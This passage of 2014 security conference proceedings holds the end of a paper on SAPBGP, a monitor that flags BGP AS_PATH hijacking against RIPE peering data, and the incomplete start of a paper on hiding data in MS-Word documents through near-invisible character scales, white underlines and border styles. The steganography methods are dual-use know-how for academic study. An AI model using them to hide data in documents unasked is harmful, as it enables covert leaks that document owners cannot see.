Renesys, which monitors such incidents, reported that its clients were victims of route hijacking caused by MITM attacks on more than 60 days. The victims include governments, Internet Service Providers (ISPs), financial institutions, etc.
Figure 2. The architecture of the SAPBGP
C. Routing policy based AS_PATH Validation
RIPE NCC provides users with the RIPE Data Repository, which contains BGP peer information. Through this information, we can determine whether any AS is connected to another AS. This peer information has been collected by either the Routing Information Service (RIS) or the Internet Routing Registry (IRR). RIS has collected and stored Internet routing data from several locations all over the world since 2001.
Using the peer information, the SAPBGP monitors the live BGP stream from BGPmon. For example, in Figure 1, suppose that AS 400 pretends to be connected to AS 100, creates a BGP message as if it came from AS 100, and forwards it. AS 500 cannot check whether AS 400 and AS 100 are connected to each other, even though AS 500 can conduct origin validation. However, suppose that either AS 500 or one of AS 500's neighbors is a BGPmon participant and the SAPBGP can receive the live BGP stream related to AS 500. The AS_PATH attribute in the BGP stream should then contain the path (100, 400, 500), and the SAPBGP can determine that AS 100 and AS 400 are not connected to each other according to the peer information collected from the RIPE NCC repository. As a result, an AS 500 administrator will be alerted by the SAPBGP and will realize that AS 400 might be attempting a MITM attack to draw AS 500's traffic heading to AS 100.
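The check above reduces to verifying every adjacent pair of ASes in the AS_PATH against the peer relationships collected from RIPE. A minimal Python sketch, with a peer set invented for the Figure 1 scenario:

```python
# Peer links learned from the RIPE repository (undirected pairs; illustrative data).
PEERS = {frozenset(p) for p in [(100, 200), (200, 300), (300, 500), (400, 500)]}

def validate_as_path(as_path, peers=PEERS):
    """Return the first unconnected adjacent pair, or None if the path is valid."""
    for a, b in zip(as_path, as_path[1:]):
        if frozenset((a, b)) not in peers:
            return (a, b)
    return None

print(validate_as_path([100, 200, 300, 500]))  # None: every hop is a known peering
print(validate_as_path([100, 400, 500]))       # (100, 400): not peers, so suspicious
```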
IV. SECURE AS_PATH BGP

In this section, we give an overview of how the SAPBGP works; Figure 2 depicts the architecture of the SAPBGP.
A. Constructing the Database
We construct our own database using the API provided by RIPE. Since the eighteenth of February, 2014, we have collected all AS import and export policy information every day. In addition, we keep separate tables in the database: one for each day's information, and an accumulated table that grows by adding new exports and imports to the existing ones.
As of the sixth of June, 2014, there are 77,776 ASes in the world. We sent queries to RIPE one by one. For example, a query about AS 1 returns AS 1's export policies, import policies, and prefixes in JSON format. The SAPBGP parses the results so that the lists of export and import policies can be stored in AS 1's record in the table. As a result, a new table is created every day to keep track of the daily policy information. In addition, the accumulated table is updated with new policies whenever AS 1 adds policies toward other ASes. Figure 3 shows the records from AS 10001 to AS 10005 in the policy table.
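The relationship between the daily tables and the accumulated table can be sketched as follows, with in-memory dictionaries standing in for the MySQL tables (the names and policy strings are our own illustration):

```python
def store_daily_snapshot(day, snapshot, daily_tables, accumulated):
    """Keep the day's snapshot as its own table and fold it into the accumulated table."""
    daily_tables[day] = {asn: set(policies) for asn, policies in snapshot.items()}
    for asn, policies in snapshot.items():
        accumulated.setdefault(asn, set()).update(policies)

daily_tables = {}   # one "table" per collection day
accumulated = {}    # ASN -> union of all policies seen so far

store_daily_snapshot("2014-02-18",
                     {1: {"export: to AS2", "import: from AS3"}},
                     daily_tables, accumulated)
store_daily_snapshot("2014-02-19",
                     {1: {"export: to AS2", "export: to AS5"}},
                     daily_tables, accumulated)

# The accumulated record keeps old policies even after the daily snapshot changed.
print(sorted(accumulated[1]))
# ['export: to AS2', 'export: to AS5', 'import: from AS3']
```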
Figure 3. A screen capture of the policy table
B. Monitoring the Live BGP Stream
BGPmon provides the live BGP stream to the public through telnet. Whenever a router connected to BGPmon receives BGP update messages, BGPmon converts them to XML messages and propagates the XML messages to its clients. Apart from the BGP update message itself, the XML message includes a timestamp, date and time, the BGPmon ID, the BGPmon sequence number, and so on.
Currently, there are nine participants directly connected to BGPmon: AS 3043, AS 10876, AS 3257, AS 3303, AS 812, AS 5568, AS 14041, AS 28289, and AS 12145. We measured the number of update messages that BGPmon propagated for one hour on the twenty-sixth of February, 2014. Table I shows the minimum, maximum, and average number of update messages per 10 seconds.
TABLE I. THE NUMBER OF UPDATE MESSAGES FROM BGPMON

The number of update messages per 10 seconds
  Minimum      38
  Maximum    1672
  Average  119.43

After parsing a live BGP message, the SAPBGP retrieves the ASN attribute and the AS_PATH attribute to check whether the ASes in the AS_PATH attribute are connected to each other. First, we compare against the policy table collected one day before. If we cannot find the pair, we compare against the accumulated table. If we still cannot find the pair, we consider the AS_PATH attribute suspicious and notify the AS network administrators.

V. PERFORMANCE TEST AND RESULT ANALYSIS

In this section, we explain the environment in which the SAPBGP constructs its own database by collecting the RIPE repository and checks the live BGP stream from BGPmon for invalid AS_PATH attributes. In addition, we conduct the performance test and analyze its results.

A. Experiment
We have constructed our database by collecting BGP policy records daily from the RIPE repository since the eighteenth of February, 2014. Based on our tables, the SAPBGP checked the live BGP stream from BGPmon.

Figure 4 shows the result of the AS_PATH monitoring experiment through the SAPBGP from the eighteenth of February, 2014 to the eighth of June, 2014. We conducted the experiment once a week during that period. The original data collected contain many duplicated results, but the outcome in Figure 4 does not contain the duplications. Our result shows that 4.57% of the AS_PATH attributes are invalid and 95.43% are valid.

Figure 4. The result of the AS_PATH monitoring experiment

TABLE II. THE COMPARISON OF THE RESULTS

                                  Original results   No duplication
Valid                                       230575            13490
Invalid                                       3931              656
Valid by the accumulated records              4508              205

Table II shows the comparison between the original results and the results without duplications. Because BGP update periods vary, some pairs of ASes are duplicated more often than others.

Figure 5 illustrates a portion of the policy table of the invalid ASes that the SAPBGP detected in the experiment. The invalid ASes could signify either that the AS holder does not configure policies or that the AS_PATH attribute was manipulated by hijackers.
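The three categories in Table II mirror the SAPBGP lookup order: the daily table is consulted first, then the accumulated table, and a pair found in neither is flagged as suspicious. A minimal Python sketch of that decision, with invented data:

```python
def classify_pair(pair, daily_table, accumulated_table):
    """Classify one adjacent AS pair taken from an AS_PATH."""
    if pair in daily_table:
        return "valid"
    if pair in accumulated_table:
        return "valid by accumulated records"
    return "suspicious"  # would trigger a notification to the AS administrators

daily = {frozenset((100, 200))}
accumulated = {frozenset((100, 200)), frozenset((200, 300))}

print(classify_pair(frozenset((100, 200)), daily, accumulated))  # valid
print(classify_pair(frozenset((200, 300)), daily, accumulated))  # valid by accumulated records
print(classify_pair(frozenset((100, 400)), daily, accumulated))  # suspicious
```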
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 5. A portion of the policy table
23
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
B. Performance Test
The SAPBGP runs on a 3.40 GHz Core i5-3570 machine with 16 GB of memory running Windows 7. MySQL Ver. 14.14 Distrib 5.1.41 is used for the database. The SAPBGP is implemented in Java to collect daily updates from RIPE, to receive the live BGP stream from BGPmon, and to validate the BGP stream by comparing the AS_PATH attribute against our database. The SAPBGP and the database are located on the same machine to reduce the connection latency between them.
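The real-time claim can be checked with quick arithmetic from the measured figures: 256 microseconds per AS-pair validation (Figure 6) and a peak of 1,672 update messages per 10 seconds (Table I). This sketch conservatively charges one validation per message:

```python
validation_time_s = 256e-6   # average validation time per AS pair (Figure 6)
peak_messages = 1672         # maximum update messages per 10 s (Table I)

worst_case = peak_messages * validation_time_s
print(f"{worst_case:.3f} s of work per 10 s window")  # 0.428 s of work per 10 s window
assert worst_case < 10.0     # well within the 10-second budget
```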
Figure 6. The result of the performance test for the AS_PATH validation

Figure 6 shows the AS_PATH validation time. The validation time includes accessing the database, retrieving the specific AS record from a table, and comparing the AS_PATH attribute to the AS's record. On average, validating a pair of ASes takes 256 microseconds. According to Table I, the maximum number of live BGP messages per 10 seconds is 1672. Consequently, the SAPBGP can process all of the live BGP messages coming from BGPmon in real time.

VI. CONCLUSION

Although many solutions have been proposed to prevent IP prefix hijacking, such as RPKI, BGPmon, Argus, and PHAS, none of them except RPKI protects against AS path hijacking. SIDR proposed BGPsec on top of the RPKI, but BGPsec is still a work in progress. In order to monitor AS path hijacking, we propose the Secure AS_PATH BGP (SAPBGP), which checks whether the ASes in the AS_PATH attribute of update messages are actually connected to each other, based on our policy database collected from the RIPE NCC repository. The result of the AS_PATH validation test shows that 4.57% of the AS_PATH attributes are invalid and 95.43% are valid from the fifteenth of April, 2014 to the eighth of June, 2014. In addition, the result of the performance test verifies that the SAPBGP can process all of the live BGP messages coming from BGPmon in real time. The ratio of invalid AS_PATH attributes in the monitoring experiment is high because some AS operators still do not configure their policies. For a precise result of policy-based AS_PATH validation, every router needs to configure policies against its peers.

REFERENCES
[1] Y. Rekhter, "A Border Gateway Protocol 4 (BGP-4)," RFC 4271, 2006.
[2] S. Murphy, "BGP Security Vulnerabilities Analysis," RFC 4272, 2006.
[3] Renesys Blog, "Pakistan hijacks YouTube" [Online]. Available: http://www.renesys.com/blog/2008/02/pakistan_hijacks_youtube_1.shtml [Accessed February 2014].
[4] T. Manderson, L. Vegoda, and S. Kent, "Resource Public Key Infrastructure (RPKI) Objects Issued by IANA," RFC 6491, 2012. [Online]. Available: http://www.rfc-editor.org/rfc/rfc6491.txt [Accessed January 2014].
[5] BGPmon, "Google's services redirected to Romania and Austria" [Online]. Available: http://www.bgpmon.net/googles-services-redirected-to-romania-and-austria [Accessed October 2013].
[6] X. Shi, Y. Xiang, Z. Wang, X. Yin, and J. Wu, "Detecting Prefix Hijackings in the Internet with Argus," in Proc. of ACM IMC 2012.
[7] M. Lad, D. Massey, D. Pei, Y. Wu, B. Zhang, and L. Zhang, "PHAS: A prefix hijack alert system," in Proceedings of the 15th USENIX Security Symposium (USENIX-SS'06), Vol. 15, 2006, pp. 153-166.
[8] Renesys Blog, "Targeted Internet Traffic Misdirection" [Online]. Available: http://www.renesys.com/2013/11/mitm-internet-hijacking [Accessed January 2014].
[9] M. Lepinski, Ed., "BGPSEC Protocol Specification," IETF Internet-Draft. Available: http://tools.ietf.org/html/draft-ietf-sidr-bgpsec-protocol-08.
[10] Q. Li, Y. Hu, and X. Zhang, "Even Rockets Cannot Make Pigs Fly Sustainably: Can BGP be Secured with BGPsec?," 2014.
[11] The BGPmon project, http://bgpmon.netsec.colostate.edu [Accessed 6th July 2013].
[12] M. Lepinski, S. Kent, and D. Kong, "A Profile for Route Origin Authorizations (ROAs)," RFC 6482. [Online]. Available: http://tools.ietf.org/html/rfc6482 [Accessed December 2012].
[13] L. Blunk, "Multi-Threaded Routing Toolkit (MRT) Routing Information Export Format," RFC 6396, 2011.
A New Property Coding in Text Steganography of Microsoft Word Documents
Ivan Stojanov, Aleksandra Mileva, Igor Stojanović
University of Goce Delčev
Štip, Macedonia
Email: {ivan.stojanov, aleksandra.mileva, igor.stojanovik}@ugd.edu.mk
Abstract—Electronic documents, like printed documents, need to be secured by adding specific features that allow efficient copyright protection, authentication, document tracking, or investigation of counterfeiting and forgeries. Microsoft Word is one of the most popular word processors, and several methods exist for embedding data specifically in documents produced by it. We present a new type of method for hiding data in Microsoft Word documents, named Property coding, which exploits the properties of different document objects (e.g., characters, paragraphs, and sentences) for embedding data. We give four different ways of Property coding, which are resistant to save actions, introduce a very small overhead on the document size (about 1%), can embed up to 8 bits per character, and, of course, go unnoticed by readers. Property coding belongs to the format-based methods of text steganography.
Keywords–Data Hiding; Microsoft Word.
I. INTRODUCTION
Steganography is the art of undetectably altering some seemingly innocent carrier to embed or hide secret messages. Modern digital steganography utilizes computers and new information technologies, and one can use an image, text, video, audio, file, protocol header or payload, or similar, as a carrier. Watermarking, on the other hand, is the art of imperceptibly altering some carrier to embed a message about that carrier. Each steganographic and watermarking system consists of an embedder and a detector; the carrier is called the cover work, and the result of embedding is called the stego (watermarked) work [1]. Information hiding (or data hiding) is a general term encompassing a wider range of problems, and it includes both steganography and watermarking.
Text steganography refers to the hiding of information within text (see surveys [2][3]). Text is one of the oldest media used for hiding data; before the era of digital steganography, letters, books, and telegrams were used to hide secret messages within their texts. Text documents are also the most prevalent digital media today, found in the form of newspapers, books, web pages, source code, contracts, advertisements, etc. The development of text steganography and steganalysis is therefore very important. On the one hand, data hiding methods in text documents are big threats to cybersecurity and new communication tools for terrorists and other criminals. On the other hand, these methods have legitimate applications in document tracking, copyright protection, authentication, investigation of counterfeiting and forgeries, etc. [4][5][6].
Microsoft Word is one of the most popular document and word processing programs, which comes as a part of the Microsoft Office package. It is attractive for average users because of its ease of text editing and richness of text formatting features.
In this paper, we present four new methods for hiding data in MS-Word documents. We use the properties of different document objects, like characters, paragraphs, and sentences, for data hiding. Additionally, these techniques can be adjusted for use in documents produced by other word processors, like Apache OpenOffice, Corel WordPerfect, etc. Section II is devoted to the different techniques used in text steganography, and Section III presents several existing methods and techniques specially designed for MS-Word documents. Our four new methods are presented in Section IV, and experimental results and discussion are given in Section V.
II. TEXT STEGANOGRAPHY
There are three main categories of text steganography:
format based methods, random and statistical generation, and
linguistic methods [7].
A. Format based methods
Format based methods generally format and modify existing text to conceal data. Several different techniques for hiding data in text documents are presented below. Some of them, like line shift coding or the insertion of special characters, can pass unnoticed by readers but can be detected by computer; others, like font resizing, can pass undetected by computer, but a human can detect them. Hidden information can usually be destroyed, for example, by character recognition programs.
1) Line Shift Coding: In line shift coding, each even line is shifted by a small predetermined amount (e.g., 1/300 inch or less) either up or down, representing binary one or zero, respectively [8][9][10]. The odd lines are used as control lines for detecting the shifting of the even lines, and their position is static. In this way, the original document is not needed for decoding.
2) Word Shift Coding: Similarly to line shift coding, in word shift coding each even word is shifted by a small predetermined amount (e.g., 1/150 inch or less) left or right, representing binary one or zero, respectively [9][10]. Again, each odd word serves as a control word, which is used for measuring and comparing distances between words. Since the word spacing in the original document is not uniform, the original document is needed for decoding. Low, Maxemchuk, Brassil, and O'Gorman [8] use a combination of line and word shifting: each even line is additionally divided into three blocks of words, and only the middle block is shifted left or right. In [11], a line is divided into segments of consecutive words, and neighbouring segments share one word. By shifting only the middle words of a segment, 1 or 2 bits can be coded per segment.
3) Feature Coding: In feature coding (or character coding), features of some characters in the text are changed [9][10]. For example, an individual character's height or its position relative to other characters can be changed; the horizontal line in the letter t can be extended or shortened; the size of the dot in the letters i and j can be increased or decreased, etc. The last technique can be applied to 14 letters of the Arabic alphabet [12]. Other feature coding methods for the Arabic alphabet [13][14] use the redundancy in diacritics to hide information.
4) Open method: In this group of techniques, some special characters are inserted in the cover text. For example, spaces can be inserted at the end of each sentence, at the end of each line, between words [15], or at the end of each paragraph [16]. A text processor can change the number of spaces and destroy the hidden message. There are several software tools that implement variants of the open method, like SNOW [17], WhiteSteg [18], and UniSpaCh [19], which uses Unicode space characters.
Other techniques [20][21], which can be put in this group, widen, shrink, or leave unchanged an inter-word space to encode data.
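A minimal Python sketch of the open method, as our own illustration rather than any of the cited tools: one trailing space per line encodes a 1 bit and no trailing space a 0 bit, so any reformatting that trims whitespace destroys the message, as noted above.

```python
def embed(cover_lines, bits):
    """One bit per line: a trailing space encodes 1, no trailing space encodes 0."""
    assert len(bits) <= len(cover_lines), "cover text too short for the message"
    coded = [line + (" " if bit == "1" else "")
             for line, bit in zip(cover_lines, bits)]
    return coded + cover_lines[len(bits):]

def extract(stego_lines, n_bits):
    return "".join("1" if line.endswith(" ") else "0"
                   for line in stego_lines[:n_bits])

cover = ["The quick brown fox", "jumps over", "the lazy dog", "near the river"]
stego = embed(cover, "101")
print(extract(stego, 3))  # 101
```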
5) Luminance Modulation Coding: This coding uses character luminance modulation for hiding data. Borges and Mayer [22] embed data by individually altering the luminance of each character from black to any value in a real-valued discrete alphabet of cardinality S, so that each symbol represents log2(S) bits. An earlier method [23] modulates the luminance of particular pixels of the characters in a scanned text document, instead of whole characters, to hide bits. Similarly, in [24], quantization of the color intensity of each character is used in such a way that the human visual system (HVS) cannot tell the difference between original and quantized characters, but a specialized reader can. This technique works well on printed documents, too.
B. Random and Statistical Generation
In methods of random and statistical generation, a new text is generated that tries to simulate some property of normal text, usually by approximating some arbitrary statistical distribution found in real text [7].
C. Linguistic Methods
Linguistic methods manipulate the lexical, syntactic, or semantic properties of texts for hiding data, while preserving their meanings as much as possible. Known linguistic methods are syntactic and semantic methods.
With syntactic methods, data can be hidden within the syntactic structure itself. They sometimes include changing the diction and structure of text without significantly altering its meaning or tone. Some of them use punctuation, because there are many circumstances where punctuation is ambiguous or where mispunctuation has little impact on the meaning of the text. For example, one can hide a one or a zero by putting, or not putting, a comma before "and" [15]. One disadvantage is that inconsistent use of punctuation is noticeable to readers. In the Arabic language, there is a special extension character, used with pointed letters, that has no effect on the content. The authors of [25] suggest using pointed letters with the extension as binary one and pointed letters without the extension as binary zero. Wayner [26] proposed Context-Free Grammars (CFGs) as a basis for generating syntactically correct stego texts. Another method [27] manipulates sentences by shifting the locations of the noun and the verb to hide data.
Semantic methods change the words themselves. One method uses synonym substitution of words for hiding information in the text [15]. Two different synonyms can be used as binary one and zero. A similar approach uses paraphrasing of the text for hiding messages [28], for example "can" for binary 0 and "be able to" for binary 1. Another method [29] changes word spelling: in order to code zero or one, the US and UK spellings of words are used. One example is the word "color", which is spelled differently in the UK (colour) and the US (color). Other semantic methods are given in [5][30]. Semantic methods can sometimes alter the meaning of a sentence.
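The US/UK spelling method above can be sketched directly; the word list here is our own minimal example:

```python
# Each pair encodes one bit: US spelling = 0, UK spelling = 1.
US_TO_UK = {"color": "colour", "center": "centre", "flavor": "flavour"}
UK_TO_US = {uk: us for us, uk in US_TO_UK.items()}

def embed(words, bits):
    """Rewrite carrier words to US or UK spelling according to the bit stream."""
    bit_iter = iter(bits)
    out = []
    for w in words:
        base = w if w in US_TO_UK else UK_TO_US.get(w)
        if base is not None:  # this word can carry a bit
            b = next(bit_iter, None)
            out.append(base if b in (None, "0") else US_TO_UK[base])
        else:
            out.append(w)
    return out

def extract(words):
    return "".join("1" if w in UK_TO_US else "0"
                   for w in words if w in US_TO_UK or w in UK_TO_US)

stego = embed("the color and flavor of the center".split(), "101")
print(" ".join(stego))  # the colour and flavor of the centre
print(extract(stego))   # 101
```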
Different miscellaneous techniques that use typographical errors, abbreviations and acronyms, free-form formatting, transliterations, emoticons for annotating text with feelings, mixed use of languages, and similar ones are given in [31].
III. EXISTING METHODS SPECIALLY DESIGNED FOR MS-WORD DOCUMENTS
Besides the previous, more general text steganographic methods, there are several methods for data hiding specially designed for Microsoft Word documents. The technique closest to ours is the use of invisible characters, suggested by Khairullah [32]. This technique sets the foreground color of invisible characters, such as the space, tab, or carriage return characters, obtaining 24 bits per character.
Another technique, called Similar English Font Types (SEFT) [33], uses similar English fonts for hiding data. First, three similar fonts are chosen (e.g., Century751 BT, CenturyOldStyle, and CenturyExpdBT), and then 26 letters and the space character are represented by triples of capital letters, each in one of the chosen fonts.
Liu and Tsai [34] use the Change Tracking technique for hiding data in MS-Word documents. First, a cover document is degenerated with different misspellings and other mistakes usual for users, and then corrections with Change Tracking are added, so it seems as if the document is the product of a collaborative writing effort. The secret message is embedded in the choices of degenerations using Huffman coding.
Starting from MS-Office 2007, Microsoft adopted a new file format, the Office Open XML (OOXML) format. In order to guarantee a higher level of privacy and security, it also introduced the Document Inspector feature, which is used to quickly identify and remove any sensitive, hidden, and personal information. Castiglione et al. present in [35] four new methods for hiding data in MS-Word documents that resist Document Inspector analysis. Two of them (using different compression algorithms or revision identifier values) exploit particular features of the OOXML standard and have null overhead, but do not resist save actions. The other two (using a zero-dimension image or a macro) resist save actions, but have an overhead.
IV. PROPERTY CODING

We present four new format based methods for hiding data in MS-Word documents that use text formatting invisible to the human eye. They use different choices for some text properties, and because of that, we name them Property codings. The methods presented in [32] and [33] can also be classified as Property codings, because they use the font color and font type properties of a given character, respectively. The novelty of our methods is twofold. First, we introduce other character properties that can be used for hiding data, and second, we show that properties of document objects other than characters (e.g., paragraphs and sentences) can be used for hiding data.
A. Method 1 - Character Scale
When we work in MS-Word, the character scale is set to 100% by default. Increasing the character scale makes letters larger and spaces them further apart, with more white space between characters. Decreasing the scale shrinks and squeezes letters closer together. Big differences in character scale are noticeable to a human reader, but if some characters have a scale of 99% and others 101%, the human eye cannot tell the difference.
So, in the first method, we use a scale of 99% to represent binary one and a scale of 101% to represent binary zero. A scale of 100% can be used for non-encoded characters. In this way, we can hide at most as many bits as there are characters in the cover document.
Variants of this method are also possible. For example, instead of using two very close scale values, one can use four very close scale values (e.g., 97%, 98%, 99%, and 101%), where every value represents two binary digits. In this way, we double the hiding capacity of the same document, and a normal reader still won't notice it. Another variant is to change the scale of every word, rather than every character.
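The bit-to-scale mapping of Method 1, including the four-value variant, can be sketched as follows. This shows only the mapping logic; applying the scale to an actual document would go through the Word object model, which is omitted here:

```python
# Two-value variant: one bit per character.
BIT_TO_SCALE = {"1": 99, "0": 101}

# Four-value variant: two bits per character, still indistinguishable from 100%.
DIBIT_TO_SCALE = {"00": 97, "01": 98, "10": 99, "11": 101}
SCALE_TO_DIBIT = {v: k for k, v in DIBIT_TO_SCALE.items()}

def embed_dibits(bits):
    """Map a bit string of even length to per-character scale values."""
    return [DIBIT_TO_SCALE[bits[i:i + 2]] for i in range(0, len(bits), 2)]

def extract_dibits(scales):
    return "".join(SCALE_TO_DIBIT[s] for s in scales)

scales = embed_dibits("0110")   # two characters carry four bits
print(scales)                   # [98, 99]
print(extract_dibits(scales))   # 0110
```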
B. Method 2 - Character Underline
One common feature of MS-Word is character underlining. There are 16 different underline styles, with the potential of carrying 4 bits, and 224 different underline colors. Because we need the underlining to go unnoticed by the user, we use 16 variants of white color, with the potential of carrying another 4 bits.
In this way, we can hide 8 bits per character. Some characters, such as g, j, p, q, and y, change noticeably in appearance under every type of underlining. Because of that, we exclude this group of 5 characters from hiding data.
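Method 2 thus packs one data byte per character: a 4-bit index into the 16 underline styles and a 4-bit index into the 16 near-white colors. The nibble split can be sketched as follows (the style and color indices are placeholders; real values would come from the Word object model):

```python
def byte_to_underline(byte):
    """Split one data byte into (underline-style index, white-variant color index)."""
    assert 0 <= byte <= 255
    return byte >> 4, byte & 0x0F  # high nibble -> style, low nibble -> color

def underline_to_byte(style_idx, color_idx):
    return (style_idx << 4) | color_idx

style, color = byte_to_underline(ord("A"))   # 0x41
print(style, color)                          # 4 1
print(chr(underline_to_byte(style, color)))  # A
```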
C. Method 3 - Paragraph Borders
In MS-Word, one can add a border to a paragraph, sentence, picture, table, individual page, etc. A border
can be placed on the left, right, top, bottom, etc. There are 24 different border
styles, and only two of them (wdLineStyleEmboss3D and
wdLineStyleEngrave3D) are noticeable to a human reader. We
can use 16 out of the remaining 22, with the potential of carrying 4 bits.
In this method, we use the left and right borders of a paragraph
for hiding data. Again, we use 16 variants of white color for
the borders. Each paragraph in the cover document can hide 16
bits, in the following way: 4 bits from the left border style, 4 bits
from the left border color, 4 bits from the right border style, and 4 bits
from the right border color. This is what our implementation does.
We can increase the hiding capacity of this method by also using
different border widths. There are 13 border styles with
9 different border widths, two border styles with 6 different
border widths, three border styles with 5 different border
widths, one border style with 8 different border widths, one
border style with 2 different border widths, and two border
styles with 1 border width, or 155 possibilities in total.
Potentially, we have 7 bits per border style/width combination.
Through experiments, we found that RGB colours represented
by (R, G, B) components with R, G, B > 249 cannot be
distinguished from the white color (255, 255, 255). This gives
216 different colour possibilities, which can be used to
represent 7 bits. Combining these two techniques, we can
hide 28 bits, in the following way: 7 bits from the left border
style/width, 7 bits from the left border color, 7 bits from the right border
style/width, and 7 bits from the right border color.
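A hedged sketch of the extended packing: 28 payload bits split into four 7-bit fields (left style/width, left color, right style/width, right color). The style/width combination is abstracted here as a plain 7-bit index, and the near-white colors are enumerated over R, G, B in 250..255, which gives 6^3 = 216 >= 128 codes, so 7 bits fit:

```python
# Sketch of the extended Method 3 packing; the enumeration order of the
# near-white colors is our own illustrative choice, not taken from the paper.
def color_from_code(code):
    """7-bit code -> (R, G, B) with every component > 249."""
    assert 0 <= code < 128
    r, rem = divmod(code, 36)
    g, b = divmod(rem, 6)
    return (250 + r, 250 + g, 250 + b)

def code_from_color(rgb):
    r, g, b = rgb
    return (r - 250) * 36 + (g - 250) * 6 + (b - 250)

def split_fields(value28):
    """28-bit paragraph payload -> [left style, left color, right style, right color]."""
    return [(value28 >> s) & 0x7F for s in (21, 14, 7, 0)]
```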
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE I. CHARACTERISTICS OF THREE COVER DOCUMENTS

                       Document 1    Document 2    Document 3
    Pages              1             11            110
    Words              340           2381          30907
    Characters         2252          15493         190833
    Paragraphs         13            82            802
    Lines              42            328           3445
    Sentences          21            134           2028
    Original size (B)  31122         923090        4589312
TABLE II. COMPARISON OF MAXIMAL NUMBER OF EMBEDDED
BITS/CHARACTERS IN OUR METHODS AND THE METHODS PRESENTED IN [32] AND [33]

                                              Document 1    Document 2    Document 3
    Characters without g, j, p, q, y          2154          14823         182470
    Invisible characters                      364           2515          31422
    Percent of invisible characters           16.2          16.2          16.5
    Capital letters                           40            286           4704
    Max no. of embedded bits in Method 1      2252          15493         190833
    Max no. of embedded bits in Method 2      17232         118584        1459760
    Max no. of embedded bits in Method 3      364           2296          22456
    Max no. of embedded bits in Method 4      147           938           14196
    Max no. of embedded bits in [32]          8736          60360         754128
    Max no. of embedded characters in [33]    13            95            1568
    Max no. of embedded bits in [33]          104           760           12544
D. Method 4 - Sentence Borders
The final method uses the sentence outside border for hiding
data. We use only 8 border styles out of the 16, because the other 8
can be noticed by a human reader, and we use only the smallest border
width of 0.25 pt. The border styles used are wdLineStyleDashDot, wdLineStyleDashDotDot, wdLineStyleDashLargeGap,
wdLineStyleDashSmallGap, wdLineStyleDot, wdLineStyleInset, wdLineStyleOutset, and wdLineStyleSingle. Each sentence
in the cover document can hide 7 bits: 3 bits from the outside
border style and 4 bits from the outside border color.
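A sketch of the per-sentence mapping, using the eight interop style names listed above; the 16 white variants are again abstracted as a 4-bit index, and the bit-to-style assignment is our own illustrative choice, not taken from the paper:

```python
# Per-sentence encoding for Method 4: 3 bits select one of eight unobtrusive
# border styles, 4 bits select a near-white color, all at the smallest width.
STYLES = ["wdLineStyleDashDot", "wdLineStyleDashDotDot", "wdLineStyleDashLargeGap",
          "wdLineStyleDashSmallGap", "wdLineStyleDot", "wdLineStyleInset",
          "wdLineStyleOutset", "wdLineStyleSingle"]

def sentence_encoding(bits7):
    assert 0 <= bits7 < 128
    return STYLES[bits7 >> 4], bits7 & 0x0F  # (style name, white-variant index)

def sentence_decoding(style, color_index):
    return (STYLES.index(style) << 4) | color_index
```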
V. EXPERIMENTAL RESULTS AND DISCUSSIONS
Each new method presented here is implemented in C# using the
Microsoft.Office.Interop.Word namespace. Our implementations of the
four methods use 8 bits to represent an extended ASCII character,
except for the last method, where we use 7 bits to represent an ASCII
character. For our experiments, we use three types of MS-Word
documents as cover documents (short, medium, and large), with
properties given in Table I.
For each cover document, we hide 10, 50, 100, 500, 1000,
and 5000 characters (where possible), and we measure the
size of the obtained stego document. Naturally, the new size
is bigger than the original size; it is given in bytes and as a
ratio to the original size.
From the results in Tables III, IV, and V, one can see that
all techniques have a small impact on document size: the
stego-to-original size ratio stays below 1.206 for Document 1,
below 1.033 for Document 2, and below 1.021 for Document 3
for the evaluated message lengths. Method 2 has the smallest
influence on the size for the short and large documents, and
Method 3 has the smallest influence for the medium document.

TABLE III. EXPERIMENTAL RESULTS FOR DOCUMENT 1 WITH ORIGINAL SIZE OF 31122 B
(each cell: stego size in bytes, with the ratio to the original size in parentheses; "/" means the message does not fit)

                10 chars          50 chars          100 chars         500 chars         1000 chars        5000 chars
    Method 1    31448 (1.01047)   32347 (1.03936)   33390 (1.04074)   /                 /                 /
    Method 2    31249 (1.00408)   31530 (1.01310)   31986 (1.02776)   34482 (1.10796)   37517 (1.20548)   /
    Method 3    31295 (1.00555)   /                 /                 /                 /                 /
    Method 4    31356 (1.00751)   /                 /                 /                 /                 /

TABLE IV. EXPERIMENTAL RESULTS FOR DOCUMENT 2 WITH ORIGINAL SIZE OF 923090 B

                10 chars           50 chars           100 chars          500 chars          1000 chars         5000 chars
    Method 1    923609 (1.00056)   924750 (1.00179)   925472 (1.00258)   934834 (1.01272)   946697 (1.02557)   /
    Method 2    924243 (1.00124)   924605 (1.00164)   925180 (1.00226)   926341 (1.00352)   928582 (1.00624)   953474 (1.03291)
    Method 3    923455 (1.00039)   924398 (1.00141)   924547 (1.00157)   /                  /                  /
    Method 4    923587 (1.00053)   924013 (1.00099)   925290 (1.00238)   /                  /                  /

TABLE V. EXPERIMENTAL RESULTS FOR DOCUMENT 3 WITH ORIGINAL SIZE OF 4589312 B

                10 chars            50 chars            100 chars           500 chars           1000 chars          5000 chars
    Method 1    4589321 (1.00000)   4589363 (1.00001)   4591027 (1.00037)   4595001 (1.00123)   4605370 (1.00349)   4682285 (1.02025)
    Method 2    4589313 (1.00000)   4589356 (1.00000)   4589574 (1.00005)   4592093 (1.00060)   4595782 (1.00140)   4608077 (1.00408)
    Method 3    4589512 (1.00004)   4589567 (1.00005)   4589597 (1.00006)   4591231 (1.00041)   4593443 (1.00090)   /
    Method 4    4589376 (1.00001)   4589396 (1.00011)   4591778 (1.00010)   4595859 (1.00142)   4603958 (1.00319)   /
From Table II, one can see that Method 2 has the
highest embedding capacity, followed by Method 1, while
Method 4 has the smallest embedding capacity. The number of
invisible characters is only a small portion of the total number
of characters in every document; in our three documents it
is less than 17% (see Table II). So, if we compare our Method
2 with the method introduced by Khairullah [32] (Table II),
we can embed more characters with Method 2. One can see that,
for all three documents, the maximal number of embedded
bits by [32] ('number of invisible characters' × 24) is almost
half of the maximal number of embedded bits by Method 2
('number of characters without g, j, p, q, and y' × 8). For the
method proposed by Bhaya et al. [33], three
consecutive capital letters in the document serve to embed one
character, so the maximal number of embedded bits depends
strongly on the number of capital letters. If we use 8 bits per
character, this method has the smallest embedding
capacity of all the analyzed methods (Table II). Even
if all characters were capital letters, we could embed
almost three times fewer characters than with Method
2. Bhaya et al. [33] suggested using only three similar font
types, which limits the maximal number of different characters
